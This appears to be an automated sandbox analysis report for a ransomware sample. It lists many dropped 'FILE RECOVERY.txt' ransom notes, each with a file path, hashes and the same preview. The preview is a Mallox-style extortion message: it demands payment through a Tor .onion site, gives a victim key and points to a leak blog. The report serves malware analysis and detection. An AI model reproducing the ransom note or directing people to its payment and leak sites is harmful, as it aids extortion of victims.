                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\Settings\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\SystemAppData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\TempState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\AC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\AC\INetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\AC\INetCookies\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\AC\INetHistory\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\AC\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\LocalCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\LocalState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\RoamingState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\Settings\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\SystemAppData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\TempState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\AC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\AC\INetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\AC\INetCookies\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
